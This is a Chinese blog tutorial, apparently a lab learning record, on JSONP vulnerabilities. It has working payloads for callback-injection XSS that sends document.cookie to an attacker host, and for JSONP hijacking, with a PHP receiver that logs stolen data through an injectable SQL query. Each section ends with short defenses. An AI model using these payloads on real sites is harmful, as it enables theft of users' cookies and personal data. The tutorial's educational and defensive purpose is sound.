JSONP跨域访问漏洞

最新推荐文章于 2024-03-21 18:26:30 发布
最新推荐文章于 2024-03-21 18:26:30 发布
阅读量422 收藏 2
点赞数
文章标签: php web安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Echo__h/article/details/130465489
版权

JSONP跨域访问漏洞

文章目录

一、漏洞原理

SONP跨域漏洞主要是Callback用户可控导致的XSSJSONP劫持两种类型

JSONP劫持,实质上算是一种读取型的CSRF,在恶意的网页中构造恶意的JS代码,当合法用户点击该网页,由于目标站点存在JSONP劫持漏洞的接口,因此会将用户的该接口对应的信息劫持,并将其发送到攻击者的服务器。


二、callback参数自定义引起的XSS
1.漏洞利用

构造如下页面,创建恶意链接诱使用户点击,即可获取用户的信息

<script>
	function test(args) {
    // 调用stringfy方法,将JSON对象转换为字符串
    	alert(JSON.stringify(args));
    }
</script>

<script src="http://192.168.30.103/jsonp.php?callback=location.href=
            'http://192.168.30.104/security/xssrecv.php?url=' %2B location.href %2B '%26cookie='
             %2B document.cookie;//"></script>
			// %2B为+ %26为&
</script>

模拟用户访问,成功将cookie和url地址添加到数据库

image-20230501235323366

2.防御

过滤callback函数名称和内容

设置白名单,提前沟通好允许传输的内容

严格按照JSON格式标准输出,添加header (“Content-Type:application/json”)


三、JSONP劫持

通过对callback的过滤,无法利用跨域访问漏洞实现xss攻击,但还存在JSONP漏洞

1.漏洞利用

以DoraBox靶场的jsonp模块为例

在攻击者服务器192.168.30.104上创建jsonpuse.html(发送恶意请求)和jsonpuse.php(接收用户信息)

jsonpuse.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>JSONP</title>
    
	// 获取数据发送到攻击者服务器
	<script>
        function callBack(args) {
            location.href="http://192.168.30.104/jsonprecv.php?value=" + 
            JSON.stringify(args) + "&referer=" + document.referer;
        }
    </script>
   	
	// 访问有jsonp漏洞的服务器
    <script src="http://192.168.30.103/security/dorabox/csrf/jsonp.php?callback=callBack"></script>

</head>
<body>
    
</body>
</html>

jsonprecv.php

<?php

// 获取参数
$ipaddr = $_SERVER['REMOTE_ADDR'];
$referer = $_GET['referer'];
$value = $_GET['value'];

// 写入数据库
$conn = new mysqli('127.0.0.1', 'root', '123456', 'learn') or die('database connected fail');
$conn -> character_set_name('utf8');
$sql = "insert into jsonpdata(ipaddr, referer, value, time) values('$ipaddr', '$referer', '$value', now())";
$conn->query($sql) ;

// 跳转页面
echo "<script>location.href='http://www.baidu.com'</script>";

?>

模拟用户打开jsonpuse.html,查看数据库,成功将用户信息写入攻击者服务器

image-20230502090331630

2.防御

Referer校验/过滤增加CSRF Token



以上为本人学习过程记录,未用于非法用途
欢迎各位大佬指正

ZeroK_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php-dos-attack:利用PHP的json_decode漏洞
05-13
PHP服务器上模拟哈希冲突攻击 签出。 这个怎么运作 PHP哈希表容易受到复杂性攻击。 因此,每个需要外部输入并在PHP哈希表中进行解析的函数都容易受到复杂性攻击。 测试PHP漏洞以进行碰撞攻击 在目录test ,有PHP脚本演示了使用PHP映射的函数的漏洞。 文件collision_keys_small.txt仅包含1万个条目。 如果您想测试真实交易,则应使用collision_keys.txt (64k条目)尝试这些攻击。 运行测试 运行测试以将冲突键插入数组: docker run -it \ -v "$PWD":/usr/src/app -w /usr/src/app php:5.6-cli \ php test/array.php collision_keys.txt 运行测试以针对具有冲突键的JSON键值对调用json_decode : docker run -it -
Ajax跨域Jsonp原理解析
weixin_34218579的博客
03-09 766
关于 JSONP JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。他实现的基本原理是利用了 HTML 里 &lt;script&gt;&lt;/script&gt; 元素标签,远程调用 JSON 文件来实现数据传递。如要在 a.com 域下获取存在 b.com 的 JSON 数据( getUsers.JSON ): ...
渗透测试-JSONP数据劫持漏洞
cdyunaq的博客
03-31 7573
​介绍 JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。 更通俗的说法:JSONP 就是利用<script>标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生..
JSONP 漏洞
最新发布
weixin_45653478的博客
03-21 658
Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。为什么我们从不同的域(网站)访问数据需要一个特殊的技术(JSONP )呢?这是因为同源策略,同源策略,它是由 Netscape 提出的一个著名的安全策略,现在所有支持 JavaScript 的浏览器都会使用这个策略。传入 callback 值会在结果里面直接返回。因此,如果该参数过滤不严格。可以随便输入:callback 值为:alert('1');
浅谈JSONP跨域漏洞
weixin_39664643的博客
10-11 2737
浅谈JSONP跨域漏洞 CSRF(Cross site request forgery)跨站请求伪造,一种挟持用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法,跟XSS相比,XSS 利用的是网站对用户的信任,CSRF 利用的是网站对用户网页浏览器的信任。 提起CSRF,可能很多人都会想到修改个人资料、授权登陆等等攻击场景,可以发现这两个场景都是写入型的CSRF漏洞,通常会忽视更常见的读取型的CSRF漏洞,主流如下两种 JSONP跨域资源读取 CORS跨域资源读取 当持有敏感资源数据的服务器没
jsonp跨域漏洞
qq_44768719的博客
04-21 231
跨域:协议,域名,端口三者为域,既三者之间有一个不同即为跨域跨域的方法: jsonp(只接受get请求) 跨资源共享(cors) 原理解析:个人理解:json可以实现跨域,所以我们可以构造代码去对服务器进行请求,获取他的信息。(调用js文件时不受跨域的影响,凡是拥有src属性的标签都有跨域能力) exp: <html> <head> <meta charset="utf-8"> <title>JSONP劫持测试</title> </hea
jsonp漏洞
weixin_45682070的博客
02-04 226
jsonp原理 ajax请求受同源策略影响,不允许进行跨域请求,而script标签src属性中的链接却可以访问跨域的js脚本,利用这个特性,服务端不再返回JSON格式的数据,而是返回一段调用某个函数的js代码,在src中进行了调用,这样实现了跨域。 实现: 1:构造jsonp.php文件 下面使用JSONP,将前端代码中的ajax请求去掉,添加了一个script标签,标签的src指向了另一个域下的remote.js脚本 <!DOCTYPE html> <html> <head&
AJax与Jsonp跨域访问问题小结
10-23
本文给大家汇总介绍了JavaScript的AJax,JQuery的AJax以及利用jsonp实现跨域访问的问题,非常的细致全面,有需要的小伙伴可以参考下。
jquery下利用jsonp跨域访问实现方法
10-28
客户端的跨域访问,可以通过jsonp方式来实现,jquery提供了跨域访问的方法,jQuery.ajax()支持get方式的跨域。当然支持跨域还需要服务器端相应的处理。
浅谈JQuery+ajax+jsonp 跨域访问
10-22
下面小编就为大家带来一篇浅谈JQuery+ajax+jsonp 跨域访问。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
AngularJS实现的JSONP跨域访问数据传输功能详解
10-19
主要介绍了AngularJS实现的JSONP跨域访问数据传输功能,较为详细的分析了JSONP的概念、功能并结合实例形式给出了AngularJS使用JSONP进行跨域访问数据传输的相关技巧,需要的朋友可以参考下
jsonp跨域请求实现示例
10-20
本文主要介绍了jsonp跨域请求实现示例。具有很好的参考价值。下面跟着小编一起来看下吧
生命在于学习——Jsonp漏洞
易水哲的博客
09-05 1508
Jsonp学习笔记记录。
Web漏洞之CORS与JSONP跨域漏洞
小赵同学的博客
06-26 686
CORS与JSONP跨域漏洞
JSONP漏洞分析及利用方式
ak.Gh0st的博客
11-02 1527
jSONP 的最基本的原理是:动态添加一个< script >标签,而 script 标签的 src 属性是没有跨域的限制的。由于同源策略的限制,XmlHttpRequest 只允许请求当前源(域名、协议、端口都相同)的资源,如果要进行跨域请求, 我们可以通过使用 html 的 script 标记来进行跨域请求,并在响应中返回要执行的 script 代码,其中可以直接使用 JSON 传递 javascript 对象。
浅谈CSRF跨域读取型漏洞JSONP劫持
记录学习,一起进步
03-06 778
CSRF跨域读取型漏洞JSONP劫持
一次实战之JSONP 漏洞
战神/calmness的博客
01-03 1123
描述 Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。 为什么我们从不同的域(网站)访问数据需要一个特殊的技术(JSONP )呢?这是因为同源策略。 同源策略,它是由Netscape提出的一个著名的安全策略,现在所有支持JavaScript 的浏览器都会使用这个策略。 传入callback 值会在结果里面直接返回。因此,如果该参数过滤不严格。可以随便输入:callback值为:alert(‘1’);parse
蜜罐中利用jsonp跨域漏洞和xss漏洞的分析
HBohan的博客
02-12 1428
一、前言 我们在打红队的时候,经常会碰到蜜罐,而更有一些“主动防御”的蜜罐中利用到了一些网站的跨域漏洞和xss,对此进行简单分析。 二、蜜罐的概念 蜜罐主要是通过布置诱饵,诱使攻击者实施攻击,然后通过流量捕获、行为分析等对攻击者画像及溯源。 例如HFish蜜罐,属于高交互蜜罐,通过捕获攻击者行为,获取攻击者攻击数据、IP地址等,然而只是获取这些数据进行攻击者画像是远远不够的,而HFish也提供了自定义web蜜罐的部署,简单分析下碰到的两个蜜罐。 以下是红队和漏洞挖掘中碰到的两个蜜罐截图。 为什么说是“.
jsonp跨域访问漏洞
05-10
JSONP (JSON with Padding) 是一种跨域访问数据的方式,它利用了 script 标签不受同源策略限制的特性,可以通过动态创建 script 标签的方式,向另一个域名下的服务器发送 GET 请求,获取返回的数据。 JSONP 的实现...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值